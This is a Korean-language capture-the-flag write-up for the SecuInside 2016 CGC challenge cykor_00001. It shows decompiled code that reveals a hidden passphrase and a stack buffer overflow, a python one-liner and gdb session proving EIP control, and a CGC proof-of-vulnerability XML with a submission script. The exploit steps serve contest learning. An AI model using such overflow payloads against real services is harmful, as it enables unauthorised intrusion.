[CGC] 공격 예제 코드 작성 - SecuInside 2016(CGC/cykor_00001)

SecuInside 2016 - CGC/cykor_00001-100

1. cgc 파일 elf 포멧으로 변경

vagrant@crs:~$ cgc2elf cykor_00001 vagrant@crs:~$ ls cykor_00001

2. ssh 통신하므로 sftp 활용하여, 파일 복사 후 ida로 분석

signed int sub_80481C0() {   char v1; // [esp+3Ch] [ebp-2Ch]@3   char v2; // [esp+3Dh] [ebp-2Bh]@9   char v3; // [esp+3Eh] [ebp-2Ah]@10   char v4; // [esp+3Fh] [ebp-29h]@11   char v5; // [esp+40h] [ebp-28h]@12   char v6; // [esp+41h] [ebp-27h]@13   char v7; // [esp+42h] [ebp-26h]@14   char v8; // [esp+43h] [ebp-25h]@15   char v9; // [esp+44h] [ebp-24h]@16   char v10; // [esp+45h] [ebp-23h]@17   char v11; // [esp+46h] [ebp-22h]@18   char v12; // [esp+47h] [ebp-21h]@19   char v13; // [esp+48h] [ebp-20h]@20   char v14; // [esp+49h] [ebp-1Fh]@21   char v15; // [esp+4Ah] [ebp-1Eh]@22   char v16; // [esp+4Bh] [ebp-1Dh]@23   int v17; // [esp+54h] [ebp-14h]@26   unsigned int i; // [esp+58h] [ebp-10h]@1   int v19; // [esp+60h] [ebp-8h]@1   v19 = 0;   for ( i = 0; i < 0x18; ++i )     *(&v1 + i) = 0;   if ( sub_8048470(1, (int)"What is your message?\n", 0x16u) )     sub_804867C(0);   if ( sub_8048560(0, (int)&v1, 0x18u, 10) )     return -1;   if ( v1 != 'H' || v2 != '4' )     return 7;   if ( v3 != 'P' || v4 != 'P' )     return 6;   if ( v5 != 'Y' || v6 != '_' )     return 5;   if ( v7 != 'S' || v8 != '3' )     return 4;   if ( v9 != 'C' || v10 != 'U' )     return 3;   if ( v11 != 'I' || v12 != 'N' )     return 2;   if ( v13 != 'S' || v14 != 'I' )     return 1;   if ( v15 == 'D' && v16 == '3' && sub_8048470(1, (int)"+ Are you serious?\n", 0x13u) )     sub_804867C(0);   v17 = sub_8048

--> H4PPY_S3CUINSID3

3. 취약한 함수 확인

signed int sub_80480A0() {   char v1[64]; // [esp+28h] [ebp-50h]@3   int v2; // [esp+68h] [ebp-10h]@1   unsigned int i; // [esp+6Ch] [ebp-Ch]@1   v2 = 0;   for ( i = 0; i < 64; ++i )     v1[i] = 0;   if ( sub_8048560(0, (int)v1, 128u, 10) )     return -1;   for ( i = 0; v1[i]; ++i )     ++v2;   if ( sub_8048470(1, (int)"- Why so serious?\n", 0x12u) )     sub_804867C(0);   return v2; }

--> 입력값이 80개 이상 넣을 경우 bof 발생 (EIP 변경 확인)

vagrant@crs:~$ (python -c 'print "H4PPY_S3CUINSID3" + "\n" + "a"*84 + "b"*4';cat ) |./cykor_00001_cgc_file What is your message? + Are you serious? - Why so serious? Segmentation fault (core dumped) vagrant@crs:~$ gdb ./cykor_00001_cgc_file core                                  GNU gdb (GDB) 7.9 Copyright (C) 2015 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.  Type "show copying" and "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ./cykor_00001_cgc_file...(no debugging symbols found)...done. warning: core file may not match specified executable file. [New LWP 3833] Core was generated by `'. Program terminated with signal SIGSEGV, Segmentation fault. #0  0x62626262 in ?? () (gdb) i r eax            0x616161a6       1633771942 ecx            0x12     18 edx            0x80487bf        134514623 ebx            0x0      0 esp            0xbaaaaf8c       0xbaaaaf8c ebp            0x61616161       0x61616161 esi            0x61616161       1633771873 edi            0x0      0 eip            0x62626262       0x62626262 eflags         0x10292  [ AF SF IF RF ] cs             0x73     115 ss             0x7b     123 ds             0x7b     123 es             0x7b     123 fs             0x7b     123 gs             0x7b     123 (gdb) q vagrant@crs:~$

4. CGC에 맞는 xml 코드 작성

 ※ 참고

   1) http://kblab.tistory.com/287 

   2) https://cgc-docs.legitbs.net/cgc-release-documentation/walk-throughs/understanding-cfe-povs/ /

   3) https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/walk-throughs/pin-for-decree.md

<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd"> <pov>        <cbid>service</cbid>         <replay>               // recv               <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>               // send               <write><data>H4PPY_S3CUINSID3\x0a</data></write>               // recv               <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>               // send, [a * 84]               <write><data>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x0a</data></write>               // recv               <read><delim>\x0a</delim><match><data>- Are you serious?\x0a</data></match></read>         </replay> </pov>

5. 파일 전송

payload = open('crattack.xml', 'rb').read() print r.recvuntil( 'XML)' ) r.sendline(payload) print r.recv() r.interactive()